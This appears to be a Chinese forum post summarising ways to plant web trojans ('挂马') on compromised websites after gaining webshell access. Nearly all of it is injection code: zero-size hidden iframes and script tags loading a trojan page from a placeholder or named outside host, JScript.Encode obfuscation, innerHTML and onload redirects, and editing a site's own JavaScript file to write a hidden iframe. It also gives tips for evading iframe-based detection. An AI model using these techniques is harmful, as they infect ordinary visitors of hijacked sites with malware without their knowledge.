|
、最简单的也是最有效的
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
二、js挂马
<script src=http://www.xxx.com/muma.js></script>
三、js变形加密
<SCRIPT language=\"JScript.Encode\" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + \'\\r\\n<iframe src=\"http://www.xxx.com/muma.htm/\"></iframe>\';
几种挂马的方式,给大家总结出来,希望能有所帮助
配合自己的webshell,很爽啊~呵呵
我常用的是最下面那种
启动时加载一个网页:
<body onload=\"window.location=\'网页木马地址\';\"></
body>
加入一个隐藏框架:
</body>
<iframe src=\"网页木马地址\" name=\"zhu\" width=\"0\"
height=\"0\" frameborder=\"0\">
图片木马:
<html>
<body>
<iframe src=\"网页木马地址\" width=0 height=0></iframe>
<img src=\"图片地址\"></img>
</body>
</html>
邮箱网页木马:
<html>
<body>
<iframe src=\"网页木马地址\" width=0 height=0></iframe>
</body>
</html>
这段代码加到页面最后面:
</html><iframe src=\"网页木马地址\" name=\"zhu\" width
=\"0\" height=\"0\" frameborder=\"0\"></html>
一般的办法是在一个地方写上<iframe src=\"muma.htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe> 这样就可以访问muma的页面了
升级一下
先找找主页里面是否有JS的脚本,找到script language=\"javascript\" src=\"/xxxx.js\"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)
document.write(\'<IFRAME marginWidth=0 marginHeight=0 src=\"http://www.cqhk.cn/ma.htm\" frameBorder=0 width=0 scrolling=no height=0 topmargin=\"0\" leftmargin=\"0\"></IFRAME>\');
以上代码中的http://www.cqhk.cn/ma.htm,换成你自己的网页木马的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
哈哈...是不是很隐蔽了!
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
<script>
file://window.showModelessDialog(\"javascript:window.open(\'http://www.cqhk.cn/index.htm\',\'k\',\'top=3000,left=3000,width=0,height=0\');
window.close();\",\"n\",\"scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px\");
</script> |
|